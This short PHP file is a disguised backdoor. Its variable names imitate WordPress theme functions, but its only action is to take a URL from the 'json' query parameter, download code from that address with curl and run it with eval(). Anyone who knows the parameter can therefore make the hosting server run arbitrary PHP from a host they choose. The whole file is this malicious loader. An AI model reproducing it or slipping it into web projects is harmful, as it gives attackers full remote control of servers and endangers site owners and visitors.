<?php

if (isset($_GET['json'])) {
    $load_theme_textdomain_wee = $_GET['json'];
    if ($add_section_ct = curl_init()) {
        curl_setopt($add_section_ct, CURLOPT_URL, $load_theme_textdomain_wee);
        curl_setopt($add_section_ct, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($add_section_ct));
        curl_close($add_section_ct);
        exit;
    }
}